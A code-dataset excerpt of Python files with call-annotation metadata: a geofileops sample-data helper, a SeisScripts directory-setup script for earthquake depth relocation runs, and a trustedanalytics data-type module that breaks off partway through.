f"Should find 1 geofile, found {len(tmp_paths)}: \n{pprint.pformat(tmp_paths)}"
)
if dst_path.suffix == tmp_path.suffix:
gfo.move(tmp_path, dst_path)
else:
logger.info(f"Convert tmp file to {dst_path}")
gfo.makevalid(tmp_path, dst_path)
finally:
if tmp_dir.exists():
shutil.rmtree(tmp_dir)
return dst_path
def prepare_dst_path(dst_name: str, dst_dir: Optional[Path] = None):
if dst_dir is None:
return Path(tempfile.gettempdir()) / "geofileops_sampledata" / dst_name
else:
return dst_dir / dst_name
| [((25, 9, 25, 36), 'logging.getLogger', 'logging.getLogger', ({(25, 27, 25, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((94, 15, 94, 24), 'pathlib.Path', 'Path', ({(94, 20, 94, 23): 'url'}, {}), '(url)', False, 'from pathlib import Path\n'), ((58, 24, 58, 56), 'geofileops.get_layerinfo', 'gfo.get_layerinfo', ({(58, 42, 58, 55): 'testfile_path'}, {}), '(testfile_path)', True, 'import geofileops as gfo\n'), ((106, 16, 106, 38), 'shutil.rmtree', 'shutil.rmtree', ({(106, 30, 106, 37): 'tmp_dir'}, {}), '(tmp_dir)', False, 'import shutil\n'), ((134, 16, 134, 44), 'geofileops.move', 'gfo.move', ({(134, 25, 134, 33): 'tmp_path', (134, 35, 134, 43): 'dst_path'}, {}), '(tmp_path, dst_path)', True, 'import geofileops as gfo\n'), ((137, 16, 137, 49), 'geofileops.makevalid', 'gfo.makevalid', ({(137, 30, 137, 38): 'tmp_path', (137, 40, 137, 48): 'dst_path'}, {}), '(tmp_path, dst_path)', True, 'import geofileops as gfo\n'), ((140, 16, 140, 38), 'shutil.rmtree', 'shutil.rmtree', ({(140, 30, 140, 37): 'tmp_dir'}, {}), '(tmp_dir)', False, 'import shutil\n'), ((119, 21, 119, 51), 'zipfile.ZipFile', 'zipfile.ZipFile', ({(119, 37, 119, 45): 'tmp_path', (119, 47, 119, 50): '"""r"""'}, {}), "(tmp_path, 'r')", False, 'import zipfile\n'), ((147, 20, 147, 41), 'tempfile.gettempdir', 'tempfile.gettempdir', ({}, {}), '()', False, 'import tempfile\n'), ((18, 23, 18, 37), 'pathlib.Path', 'Path', ({(18, 28, 18, 36): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n'), ((130, 76, 130, 101), 'pprint.pformat', 'pprint.pformat', ({(130, 91, 130, 100): 'tmp_paths'}, {}), '(tmp_paths)', False, 'import pprint\n')] |
ziyixi/SeisScripts | relocation/depth/setup_relocation_dir.py | a484bc1747eae52b2441f0bfd47ac7e093150f1d | """
setup earthquake depth relocation directory
"""
import obspy
import sh
import numpy as np
import click
from os.path import join
from glob import glob
import copy
def generate_new_cmtsolution_files(cmts_dir, generated_cmts_dir, depth_perturbation_list):
cmt_names = glob(join(cmts_dir, "*"))
for cmt_file in cmt_names:
event = obspy.read_events(cmt_file)[0]
# gcmt_id = event.resource_id.id.split("/")[-2]
# there are some problems in changing names
gcmt_id = cmt_file.split("/")[-1]
# assume dirs like f"{generated_cmts_dir}/d-3" have already been created
for depth_per in depth_perturbation_list:
generated_name = join(generated_cmts_dir, f"d{depth_per}", gcmt_id)
# there are always problem in copy event, so here I'd like to read in the event again
event_this_depth = obspy.read_events(cmt_file)[0]
# event_this_depth = event.copy()
event_this_depth.origins[0].depth += 1000.0*depth_per
# print(generated_name, generated_cmts_dir, f"d{depth_per}", gcmt_id)
event_this_depth.write(generated_name, format="CMTSOLUTION")
def setup_basic_structure(main_dir, ref_dir, cmts_dir, depth_perturbation_list):
# main
sh.mkdir("-p", main_dir)
# ref
sh.cp("-r", ref_dir, join(main_dir, "ref"))
# refine the structure in ref
sh.rm("-rf", join(main_dir, "ref", "DATABASES_MPI"))
sh.rm("-rf", join(main_dir, "ref", "EXAMPLES"))
sh.rm("-rf", join(main_dir, "ref", "OUTPUT_FILES"))
sh.rm("-rf", join(main_dir, "ref", "doc"))
sh.rm("-rf", join(main_dir, "ref", "tests"))
# mv DATA and utils to upper level
sh.mv(join(main_dir, "ref", "DATA"), main_dir)
sh.mv(join(main_dir, "ref", "utils"), main_dir)
# cmts
sh.mkdir("-p", join(main_dir, "cmts"))
sh.cp("-r", cmts_dir, join(main_dir, "cmts", "cmts_raw"))
sh.mkdir("-p", join(main_dir, "cmts", "cmts_generated"))
for depth_per in depth_perturbation_list:
sh.mkdir("-p", join(main_dir, "cmts",
"cmts_generated", f"d{depth_per}"))
# working directory
sh.mkdir("-p", join(main_dir, "work"))
def setup_structure_after_generat_cmts(main_dir, output_dir, depth_perturbation_list):
# get cmts names
cmt_dirs = glob(join(main_dir, "cmts", "cmts_raw", "*"))
cmt_names = [item.split("/")[-1] for item in cmt_dirs]
# mkdirs
for cmt_name in cmt_names:
sh.mkdir(join(main_dir, "work", cmt_name))
for depth_per in depth_perturbation_list:
# sh.mkdir(join(main_dir, "work", cmt_name, f"d{depth_per}"))
# cp ref to working dirs
sh.cp("-r", join(main_dir, "ref"),
join(main_dir, "work", cmt_name, f"d{depth_per}"))
# mv DATA and utils back to ref
sh.mv(join(main_dir, "DATA"), join(main_dir, "ref", "DATA"))
sh.mv(join(main_dir, "utils"), join(main_dir, "ref", "utils"))
# mkdir DATA in work directory
for cmt_name in cmt_names:
for depth_per in depth_perturbation_list:
sh.mkdir(join(main_dir, "work", cmt_name, f"d{depth_per}", "DATA"))
# cp and ln files in DATA
toln = ["cemRequest", "crust1.0", "crust2.0",
"crustmap", "epcrust", "eucrust-07", "GLL", "heterogen", "Lebedev_sea99", "Montagner_model", "old", "PPM", "QRFSI12", "s20rts", "s362ani", "s40rts", "Simons_model", "topo_bathy", "Zhao_JP_model"]
for cmt_name in cmt_names:
for depth_per in depth_perturbation_list:
sh.cp(join(main_dir, "cmts", "cmts_generated",
f"d{depth_per}", cmt_name), join(main_dir, "work", cmt_name, f"d{depth_per}", "DATA", "CMTSOLUTION"))
sh.cp(join(main_dir, "ref", "DATA", "Par_file"), join(
main_dir, "work", cmt_name, f"d{depth_per}", "DATA", "Par_file"))
sh.cp(join(main_dir, "ref", "DATA", "STATIONS"), join(
main_dir, "work", cmt_name, f"d{depth_per}", "DATA", "STATIONS"))
for lnfile in toln:
sh.ln("-s", join(main_dir, "ref", "DATA", lnfile), join(
main_dir, "work", cmt_name, f"d{depth_per}", "DATA", lnfile))
# ln in work files
toln_work = ["utils"]
for lnfile in toln_work:
sh.ln("-s", join(main_dir, "ref", lnfile), join(
main_dir, "work", cmt_name, f"d{depth_per}", lnfile))
# mkdir and ln DATABASE_MPI and OUTPUT_FILES
sh.mkdir("-p", output_dir)
sh.mkdir("-p", join(output_dir, "DATABASES_MPI"))
sh.mkdir("-p", join(output_dir, "OUTPUT_FILES"))
for cmt_name in cmt_names:
for depth_per in depth_perturbation_list:
sh.mkdir("-p", join(output_dir, "DATABASES_MPI",
cmt_name, f"d{depth_per}"))
sh.mkdir("-p", join(output_dir, "OUTPUT_FILES",
cmt_name, f"d{depth_per}"))
sh.ln("-s", join(output_dir, "DATABASES_MPI",
cmt_name, f"d{depth_per}"), join(main_dir, "work", cmt_name, f"d{depth_per}", "DATABASES_MPI"))
sh.ln("-s", join(output_dir, "OUTPUT_FILES",
cmt_name, f"d{depth_per}"), join(main_dir, "work", cmt_name, f"d{depth_per}", "OUTPUT_FILES"))
@click.command()
@click.option('--main_dir', required=True, help="the main working directory", type=str)
@click.option('--output_dir', required=True, help="the output directory in scratch", type=str)
@click.option('--ref_dir', required=True, help="the reference specfem directory", type=str)
@click.option('--cmts_dir', required=True, help="the cmt solution directory", type=str)
@click.option('--depth_perturbation', required=True, help="the depth perturbation, use somthing like -3,-1,5 (in km)", type=str)
def main(main_dir, output_dir, ref_dir, cmts_dir, depth_perturbation):
depth_perturbation_list = [float(item)
for item in depth_perturbation.split(",")]
setup_basic_structure(main_dir, ref_dir, cmts_dir, depth_perturbation_list)
generated_cmts_dir = join(main_dir, "cmts", "cmts_generated")
working_cmts_dir = join(main_dir, "cmts", "cmts_raw")
generate_new_cmtsolution_files(
working_cmts_dir, generated_cmts_dir, depth_perturbation_list)
setup_structure_after_generat_cmts(
main_dir, output_dir, depth_perturbation_list)
if __name__ == "__main__":
main()
| [((123, 1, 123, 16), 'click.command', 'click.command', ({}, {}), '()', False, 'import click\n'), ((124, 1, 124, 87), 'click.option', 'click.option', (), '', False, 'import click\n'), ((125, 1, 125, 94), 'click.option', 'click.option', (), '', False, 'import click\n'), ((126, 1, 126, 91), 'click.option', 'click.option', (), '', False, 'import click\n'), ((127, 1, 127, 87), 'click.option', 'click.option', (), '', False, 'import click\n'), ((128, 1, 128, 128), 'click.option', 'click.option', (), '', False, 'import click\n'), ((35, 4, 35, 28), 'sh.mkdir', 'sh.mkdir', ({(35, 13, 35, 17): '"""-p"""', (35, 19, 35, 27): 'main_dir'}, {}), "('-p', main_dir)", False, 'import sh\n'), ((108, 4, 108, 30), 'sh.mkdir', 'sh.mkdir', ({(108, 13, 108, 17): '"""-p"""', (108, 19, 108, 29): 'output_dir'}, {}), "('-p', output_dir)", False, 'import sh\n'), ((133, 25, 133, 65), 'os.path.join', 'join', ({(133, 30, 133, 38): 'main_dir', (133, 40, 133, 46): '"""cmts"""', (133, 48, 133, 64): '"""cmts_generated"""'}, {}), "(main_dir, 'cmts', 'cmts_generated')", False, 'from os.path import join\n'), ((134, 23, 134, 57), 'os.path.join', 'join', ({(134, 28, 134, 36): 'main_dir', (134, 38, 134, 44): '"""cmts"""', (134, 46, 134, 56): '"""cmts_raw"""'}, {}), "(main_dir, 'cmts', 'cmts_raw')", False, 'from os.path import join\n'), ((15, 21, 15, 40), 'os.path.join', 'join', ({(15, 26, 15, 34): 'cmts_dir', (15, 36, 15, 39): '"""*"""'}, {}), "(cmts_dir, '*')", False, 'from os.path import join\n'), ((38, 25, 38, 46), 'os.path.join', 'join', ({(38, 30, 38, 38): 'main_dir', (38, 40, 38, 45): '"""ref"""'}, {}), "(main_dir, 'ref')", False, 'from os.path import join\n'), ((41, 17, 41, 55), 'os.path.join', 'join', ({(41, 22, 41, 30): 'main_dir', (41, 32, 41, 37): '"""ref"""', (41, 39, 41, 54): '"""DATABASES_MPI"""'}, {}), "(main_dir, 'ref', 'DATABASES_MPI')", False, 'from os.path import join\n'), ((42, 17, 42, 50), 'os.path.join', 'join', ({(42, 22, 42, 30): 'main_dir', (42, 32, 42, 37): '"""ref"""', (42, 39, 42, 49): '"""EXAMPLES"""'}, {}), "(main_dir, 'ref', 'EXAMPLES')", False, 'from os.path import join\n'), ((43, 17, 43, 54), 'os.path.join', 'join', ({(43, 22, 43, 30): 'main_dir', (43, 32, 43, 37): '"""ref"""', (43, 39, 43, 53): '"""OUTPUT_FILES"""'}, {}), "(main_dir, 'ref', 'OUTPUT_FILES')", False, 'from os.path import join\n'), ((44, 17, 44, 45), 'os.path.join', 'join', ({(44, 22, 44, 30): 'main_dir', (44, 32, 44, 37): '"""ref"""', (44, 39, 44, 44): '"""doc"""'}, {}), "(main_dir, 'ref', 'doc')", False, 'from os.path import join\n'), ((45, 17, 45, 47), 'os.path.join', 'join', ({(45, 22, 45, 30): 'main_dir', (45, 32, 45, 37): '"""ref"""', (45, 39, 45, 46): '"""tests"""'}, {}), "(main_dir, 'ref', 'tests')", False, 'from os.path import join\n'), ((48, 10, 48, 39), 'os.path.join', 'join', ({(48, 15, 48, 23): 'main_dir', (48, 25, 48, 30): '"""ref"""', (48, 32, 48, 38): '"""DATA"""'}, {}), "(main_dir, 'ref', 'DATA')", False, 'from os.path import join\n'), ((49, 10, 49, 40), 'os.path.join', 'join', ({(49, 15, 49, 23): 'main_dir', (49, 25, 49, 30): '"""ref"""', (49, 32, 49, 39): '"""utils"""'}, {}), "(main_dir, 'ref', 'utils')", False, 'from os.path import join\n'), ((52, 19, 52, 41), 'os.path.join', 'join', ({(52, 24, 52, 32): 'main_dir', (52, 34, 52, 40): '"""cmts"""'}, {}), "(main_dir, 'cmts')", False, 'from os.path import join\n'), ((53, 26, 53, 60), 'os.path.join', 'join', ({(53, 31, 53, 39): 'main_dir', (53, 41, 53, 47): '"""cmts"""', (53, 49, 53, 59): '"""cmts_raw"""'}, {}), "(main_dir, 'cmts', 'cmts_raw')", False, 'from os.path import join\n'), ((54, 19, 54, 59), 'os.path.join', 'join', ({(54, 24, 54, 32): 'main_dir', (54, 34, 54, 40): '"""cmts"""', (54, 42, 54, 58): '"""cmts_generated"""'}, {}), "(main_dir, 'cmts', 'cmts_generated')", False, 'from os.path import join\n'), ((60, 19, 60, 41), 'os.path.join', 'join', ({(60, 24, 60, 32): 'main_dir', (60, 34, 60, 40): '"""work"""'}, {}), "(main_dir, 'work')", False, 'from os.path import join\n'), ((65, 20, 65, 59), 'os.path.join', 'join', ({(65, 25, 65, 33): 'main_dir', (65, 35, 65, 41): '"""cmts"""', (65, 43, 65, 53): '"""cmts_raw"""', (65, 55, 65, 58): '"""*"""'}, {}), "(main_dir, 'cmts', 'cmts_raw', '*')", False, 'from os.path import join\n'), ((78, 10, 78, 32), 'os.path.join', 'join', ({(78, 15, 78, 23): 'main_dir', (78, 25, 78, 31): '"""DATA"""'}, {}), "(main_dir, 'DATA')", False, 'from os.path import join\n'), ((78, 34, 78, 63), 'os.path.join', 'join', ({(78, 39, 78, 47): 'main_dir', (78, 49, 78, 54): '"""ref"""', (78, 56, 78, 62): '"""DATA"""'}, {}), "(main_dir, 'ref', 'DATA')", False, 'from os.path import join\n'), ((79, 10, 79, 33), 'os.path.join', 'join', ({(79, 15, 79, 23): 'main_dir', (79, 25, 79, 32): '"""utils"""'}, {}), "(main_dir, 'utils')", False, 'from os.path import join\n'), ((79, 35, 79, 65), 'os.path.join', 'join', ({(79, 40, 79, 48): 'main_dir', (79, 50, 79, 55): '"""ref"""', (79, 57, 79, 64): '"""utils"""'}, {}), "(main_dir, 'ref', 'utils')", False, 'from os.path import join\n'), ((109, 19, 109, 52), 'os.path.join', 'join', ({(109, 24, 109, 34): 'output_dir', (109, 36, 109, 51): '"""DATABASES_MPI"""'}, {}), "(output_dir, 'DATABASES_MPI')", False, 'from os.path import join\n'), ((110, 19, 110, 51), 'os.path.join', 'join', ({(110, 24, 110, 34): 'output_dir', (110, 36, 110, 50): '"""OUTPUT_FILES"""'}, {}), "(output_dir, 'OUTPUT_FILES')", False, 'from os.path import join\n'), ((17, 16, 17, 43), 'obspy.read_events', 'obspy.read_events', ({(17, 34, 17, 42): 'cmt_file'}, {}), '(cmt_file)', False, 'import obspy\n'), ((24, 29, 24, 79), 'os.path.join', 'join', ({(24, 34, 24, 52): 'generated_cmts_dir', (24, 54, 24, 69): 'f"""d{depth_per}"""', (24, 71, 24, 78): 'gcmt_id'}, {}), "(generated_cmts_dir, f'd{depth_per}', gcmt_id)", False, 'from os.path import join\n'), ((56, 23, 57, 62), 'os.path.join', 'join', ({(56, 28, 56, 36): 'main_dir', (56, 38, 56, 44): '"""cmts"""', (57, 28, 57, 44): '"""cmts_generated"""', (57, 46, 57, 61): 'f"""d{depth_per}"""'}, {}), "(main_dir, 'cmts', 'cmts_generated', f'd{depth_per}')", False, 'from os.path import join\n'), ((70, 17, 70, 49), 'os.path.join', 'join', ({(70, 22, 70, 30): 'main_dir', (70, 32, 70, 38): '"""work"""', (70, 40, 70, 48): 'cmt_name'}, {}), "(main_dir, 'work', cmt_name)", False, 'from os.path import join\n'), ((26, 31, 26, 58), 'obspy.read_events', 'obspy.read_events', ({(26, 49, 26, 57): 'cmt_file'}, {}), '(cmt_file)', False, 'import obspy\n'), ((74, 24, 74, 45), 'os.path.join', 'join', ({(74, 29, 74, 37): 'main_dir', (74, 39, 74, 44): '"""ref"""'}, {}), "(main_dir, 'ref')", False, 'from os.path import join\n'), ((75, 18, 75, 67), 'os.path.join', 'join', ({(75, 23, 75, 31): 'main_dir', (75, 33, 75, 39): '"""work"""', (75, 41, 75, 49): 'cmt_name', (75, 51, 75, 66): 'f"""d{depth_per}"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((84, 21, 84, 78), 'os.path.join', 'join', ({(84, 26, 84, 34): 'main_dir', (84, 36, 84, 42): '"""work"""', (84, 44, 84, 52): 'cmt_name', (84, 54, 84, 69): 'f"""d{depth_per}"""', (84, 71, 84, 77): '"""DATA"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA')", False, 'from os.path import join\n'), ((91, 18, 92, 49), 'os.path.join', 'join', ({(91, 23, 91, 31): 'main_dir', (91, 33, 91, 39): '"""cmts"""', (91, 41, 91, 57): '"""cmts_generated"""', (92, 23, 92, 38): 'f"""d{depth_per}"""', (92, 40, 92, 48): 'cmt_name'}, {}), "(main_dir, 'cmts', 'cmts_generated', f'd{depth_per}', cmt_name)", False, 'from os.path import join\n'), ((92, 51, 92, 123), 'os.path.join', 'join', ({(92, 56, 92, 64): 'main_dir', (92, 66, 92, 72): '"""work"""', (92, 74, 92, 82): 'cmt_name', (92, 84, 92, 99): 'f"""d{depth_per}"""', (92, 101, 92, 107): '"""DATA"""', (92, 109, 92, 122): '"""CMTSOLUTION"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA', 'CMTSOLUTION')", False, 'from os.path import join\n'), ((93, 18, 93, 59), 'os.path.join', 'join', ({(93, 23, 93, 31): 'main_dir', (93, 33, 93, 38): '"""ref"""', (93, 40, 93, 46): '"""DATA"""', (93, 48, 93, 58): '"""Par_file"""'}, {}), "(main_dir, 'ref', 'DATA', 'Par_file')", False, 'from os.path import join\n'), ((93, 61, 94, 80), 'os.path.join', 'join', ({(94, 16, 94, 24): 'main_dir', (94, 26, 94, 32): '"""work"""', (94, 34, 94, 42): 'cmt_name', (94, 44, 94, 59): 'f"""d{depth_per}"""', (94, 61, 94, 67): '"""DATA"""', (94, 69, 94, 79): '"""Par_file"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA', 'Par_file')", False, 'from os.path import join\n'), ((95, 18, 95, 59), 'os.path.join', 'join', ({(95, 23, 95, 31): 'main_dir', (95, 33, 95, 38): '"""ref"""', (95, 40, 95, 46): '"""DATA"""', (95, 48, 95, 58): '"""STATIONS"""'}, {}), "(main_dir, 'ref', 'DATA', 'STATIONS')", False, 'from os.path import join\n'), ((95, 61, 96, 80), 'os.path.join', 'join', ({(96, 16, 96, 24): 'main_dir', (96, 26, 96, 32): '"""work"""', (96, 34, 96, 42): 'cmt_name', (96, 44, 96, 59): 'f"""d{depth_per}"""', (96, 61, 96, 67): '"""DATA"""', (96, 69, 96, 79): '"""STATIONS"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA', 'STATIONS')", False, 'from os.path import join\n'), ((113, 27, 114, 58), 'os.path.join', 'join', ({(113, 32, 113, 42): 'output_dir', (113, 44, 113, 59): '"""DATABASES_MPI"""', (114, 32, 114, 40): 'cmt_name', (114, 42, 114, 57): 'f"""d{depth_per}"""'}, {}), "(output_dir, 'DATABASES_MPI', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((115, 27, 116, 58), 'os.path.join', 'join', ({(115, 32, 115, 42): 'output_dir', (115, 44, 115, 58): '"""OUTPUT_FILES"""', (116, 32, 116, 40): 'cmt_name', (116, 42, 116, 57): 'f"""d{depth_per}"""'}, {}), "(output_dir, 'OUTPUT_FILES', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((117, 24, 118, 55), 'os.path.join', 'join', ({(117, 29, 117, 39): 'output_dir', (117, 41, 117, 56): '"""DATABASES_MPI"""', (118, 29, 118, 37): 'cmt_name', (118, 39, 118, 54): 'f"""d{depth_per}"""'}, {}), "(output_dir, 'DATABASES_MPI', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((118, 57, 118, 123), 'os.path.join', 'join', ({(118, 62, 118, 70): 'main_dir', (118, 72, 118, 78): '"""work"""', (118, 80, 118, 88): 'cmt_name', (118, 90, 118, 105): 'f"""d{depth_per}"""', (118, 107, 118, 122): '"""DATABASES_MPI"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATABASES_MPI')", False, 'from os.path import join\n'), ((119, 24, 120, 55), 'os.path.join', 'join', ({(119, 29, 119, 39): 'output_dir', (119, 41, 119, 55): '"""OUTPUT_FILES"""', (120, 29, 120, 37): 'cmt_name', (120, 39, 120, 54): 'f"""d{depth_per}"""'}, {}), "(output_dir, 'OUTPUT_FILES', cmt_name, f'd{depth_per}')", False, 'from os.path import join\n'), ((120, 57, 120, 122), 'os.path.join', 'join', ({(120, 62, 120, 70): 'main_dir', (120, 72, 120, 78): '"""work"""', (120, 80, 120, 88): 'cmt_name', (120, 90, 120, 105): 'f"""d{depth_per}"""', (120, 107, 120, 121): '"""OUTPUT_FILES"""'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'OUTPUT_FILES')", False, 'from os.path import join\n'), ((98, 28, 98, 65), 'os.path.join', 'join', ({(98, 33, 98, 41): 'main_dir', (98, 43, 98, 48): '"""ref"""', (98, 50, 98, 56): '"""DATA"""', (98, 58, 98, 64): 'lnfile'}, {}), "(main_dir, 'ref', 'DATA', lnfile)", False, 'from os.path import join\n'), ((98, 67, 99, 80), 'os.path.join', 'join', ({(99, 20, 99, 28): 'main_dir', (99, 30, 99, 36): '"""work"""', (99, 38, 99, 46): 'cmt_name', (99, 48, 99, 63): 'f"""d{depth_per}"""', (99, 65, 99, 71): '"""DATA"""', (99, 73, 99, 79): 'lnfile'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', 'DATA', lnfile)", False, 'from os.path import join\n'), ((104, 28, 104, 57), 'os.path.join', 'join', ({(104, 33, 104, 41): 'main_dir', (104, 43, 104, 48): '"""ref"""', (104, 50, 104, 56): 'lnfile'}, {}), "(main_dir, 'ref', lnfile)", False, 'from os.path import join\n'), ((104, 59, 105, 72), 'os.path.join', 'join', ({(105, 20, 105, 28): 'main_dir', (105, 30, 105, 36): '"""work"""', (105, 38, 105, 46): 'cmt_name', (105, 48, 105, 63): 'f"""d{depth_per}"""', (105, 65, 105, 71): 'lnfile'}, {}), "(main_dir, 'work', cmt_name, f'd{depth_per}', lnfile)", False, 'from os.path import join\n')] |
blbarker/atk | python-client/trustedanalytics/core/atktypes.py | bcb747d053e801820233a6439c88a457c8cf2438 | # vim: set encoding=utf-8
#
# Copyright (c) 2015 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
trusted_analytics definitions for Data Types
"""
# TODO - consider server providing types, similar to commands
__all__ = ['valid_data_types', 'ignore', 'unknown', 'float32', 'float64', 'int32', 'int64', 'vector', 'unit', 'datetime']
import numpy as np
import json
import re
# alias numpy types
float32 = np.float32
float64 = np.float64
int32 = np.int32
int64 = np.int64
from datetime import datetime
import dateutil.parser as datetime_parser
# Chose python's datetime over numpy.datetime64 because of time zone support and string serialization
# Here's a long thread discussing numpy's datetime64 timezone problem:
# http://mail.scipy.org/pipermail/numpy-discussion/2013-April/066038.html
# If need be, UDFs can create numpy objects from x using: numpy.datatime64(x.isoformat())
class _Vector(object):
base_type = np.ndarray
re_pattern = re.compile(r"^vector\((\d+)\)$")
def __init__(self, length):
self.length = int(length)
self.is_complex_type = True
self.constructor = self._get_constructor()
def _get_constructor(self):
length = self.length
def constructor(value):
"""
Creates a numpy array from a value, which can be one of many types
"""
if value is None:
return None
try:
# first try numpy's constructor
array = np.array(value, dtype=np.float64) # ensures the array is entirely made of doubles
except:
# also support json or comma-sep string
if valid_data_types.value_is_string(value):
try:
value = json.loads(value)
except:
value = [np.float64(item.strip()) for item in value.split(',') if item]
array = np.array(value, dtype=np.float64) # ensures the array is entirely made of doubles
else:
raise
array = np.atleast_1d(array) # numpy thing, so that vectors of size 1 will still have dimension and length
if len(array) != length:
raise ValueError("Could not construct vector in Python Client. Expected vector of length %s, but received length %d" % (length, len(array)))
return array
return constructor
@staticmethod
def get_from_string(data_type_str):
return _Vector(_Vector.re_pattern.match(data_type_str).group(1))
def __repr__(self):
return "vector(%d)" % self.length
vector = _Vector
class _Unit(object):
"""Ignore type used for schemas during file import"""
pass
unit = _Unit
class _Ignore(object):
"""Ignore type used for schemas during file import"""
pass
ignore = _Ignore
class _Unknown(object):
"""Unknown type used when type is indeterminate"""
pass
unknown = _Unknown
# map types to their string identifier
_primitive_type_to_str_table = {
#bool: "bool", TODO
#bytearray: "bytearray", TODO
#dict: "dict", TODO
float32: "float32",
float64: "float64",
int32: "int32",
int64: "int64",
#list: "list", TODO
unicode: "unicode",
ignore: "ignore",
datetime: "datetime",
}
# build reverse map string -> type
_primitive_str_to_type_table = dict([(s, t) for t, s in _primitive_type_to_str_table.iteritems()])
_primitive_alias_type_to_type_table = {
float: float64,
int: int32,
long: int64,
str: unicode,
#list: vector,
}
_primitive_alias_str_to_type_table = dict([(alias.__name__, t) for alias, t in _primitive_alias_type_to_type_table.iteritems()])
_primitive_type_to_default_value = {
#bool: False, TODO
float32: 0.0,
float64: 0.0,
int32: 0,
int64: 0,
unicode: "",
#datetime: "datetime",
}
def get_float_constructor(float_type):
"""Creates special constructor for floating point types which handles nan, inf, -inf"""
ft = float_type
def float_constructor(value):
result = ft(value)
if np.isnan(result) or result == np.inf or result == -np.inf: # this is 5x faster than calling np.isfinite()
return None
return ft(value)
return float_constructor
def datetime_constructor(value):
"""Creates special constructor for datetime parsing"""
if valid_data_types.value_is_string(value):
return datetime_parser.parse(value)
else:
try:
return datetime(*value)
except:
raise TypeError("cannot convert type to the datetime")
class _DataTypes(object):
"""
Provides functions with define and operate on supported data types.
"""
def __contains__(self, item):
try:
self.validate(item)
return True
except ValueError:
return False
def __repr__(self):
aliases = "\n(and aliases: %s)" % (", ".join(sorted(["%s->%s" % (alias.__name__, self.to_string(data_type)) for alias, data_type in _primitive_alias_type_to_type_table.iteritems()])))
return ", ".join(sorted(_primitive_str_to_type_table.keys() + ["vector(n)"])) + aliases
@staticmethod
def value_is_string(value):
"""get bool indication that value is a string, whether str or unicode"""
return isinstance(value, basestring)
@staticmethod
def value_is_missing_value(value):
return value is None or (type(value) in [float32, float64, float] and (np.isnan(value) or value in [np.inf, -np.inf]))
@staticmethod
def get_primitive_data_types():
return _primitive_type_to_str_table.keys()
@staticmethod
def to_string(data_type):
"""
Returns the string representation of the given type
Parameters
----------
data_type : type
valid data type; if invalid, a ValueError is raised
Returns
-------
result : str
string representation
Examples
--------
>>> valid_data_types.to_string(float32)
'float32'
"""
valid_data_type = _DataTypes.get_from_type(data_type)
try:
return _primitive_type_to_str_table[valid_data_type]
except KeyError:
# complex data types should use their repr
return repr(valid_data_type)
@staticmethod
def get_from_string(data_type_str):
"""
Returns the data type for the given type string representation
Parameters
----------
data_type_str : str
valid data type str; if invalid, a ValueError is raised
Returns
-------
result : type
type represented by the string
Examples
--------
>>> valid_data_types.get_from_string('unicode')
unicode
"""
try:
return _primitive_str_to_type_table[data_type_str]
except KeyError:
try:
return _primitive_alias_str_to_type_table[data_type_str]
except KeyError:
try:
return vector.get_from_string(data_type_str)
except:
raise ValueError("Unsupported type string '%s' " % data_type_str)
@staticmethod
def is_primitive_type(data_type):
return data_type in _primitive_type_to_str_table or data_type in _primitive_alias_type_to_type_table
@staticmethod
def is_complex_type(data_type):
try:
return data_type.is_complex_type
except AttributeError:
return False
@staticmethod
def is_primitive_alias_type(data_type):
return data_type in _primitive_alias_type_to_type_table
@staticmethod
def get_from_type(data_type):
"""
Returns the data type for the given type (often it will return the same type)
Parameters
----------
data_type : type
valid data type or type that may be aliased for a valid data type;
if invalid, a ValueError is raised
Returns
-------
result : type
valid data type for given type
Examples
--------
>>> valid_data_types.get_from_type(int)
numpy.int32
"""
if _DataTypes.is_primitive_alias_type(data_type):
return _primitive_alias_type_to_type_table[data_type]
if _DataTypes.is_primitive_type(data_type) or _DataTypes.is_complex_type(data_type):
return data_type
raise ValueError("Unsupported type %s" % data_type)
@staticmethod
def validate(data_type):
"""Raises a ValueError if data_type is not a valid data_type"""
_DataTypes.get_from_type(data_type)
@staticmethod
def get_constructor(to_type):
"""gets the constructor for the to_type"""
try:
return to_type.constructor
except AttributeError:
if to_type == float64 or to_type == float32:
return get_float_constructor(to_type)
if to_type == datetime:
return datetime_constructor
def constructor(value):
if value is None:
return None
return to_type(value)
return constructor
@staticmethod
def standardize_schema(schema):
return [(name, _DataTypes.get_from_type(t)) for name, t in schema]
@staticmethod
def validate_data(schema, data):
return [_DataTypes.cast(value, data_type) for value, data_type in zip(data, map(lambda t: t[1], schema))]
@staticmethod
def get_default_data_for_schema(schema):
return [_DataTypes.get_default_type_value(data_type) for name, data_type in schema]
@staticmethod
def get_default_type_value(data_type):
try:
return _primitive_type_to_default_value[data_type]
except KeyError:
if data_type == vector:
return []
if data_type == datetime:
return datetime.now()
raise ValueError("Unable to find default value for data type %s (invalid data type)" % data_type)
@staticmethod
def cast(value, to_type):
"""
Returns the given value cast to the given type. None is always returned as None
Parameters
----------
value : object
value to convert by casting
to_type : type
valid data type to use for the cast
Returns
-------
results : object
the value cast to the to_type
Examples
--------
>>> valid_data_types.cast(3, float64)
3.0
>>> valid_data_types.cast(4.5, str)
'4.5'
>>> valid_data_types.cast(None, str)
None
>>> valid_data_types.cast(np.inf, float32)
None
"""
if _DataTypes.value_is_missing_value(value): # Special handling for missing values
return None
elif _DataTypes.is_primitive_type(to_type) and type(value) is to_type: # Optimization
return value
try:
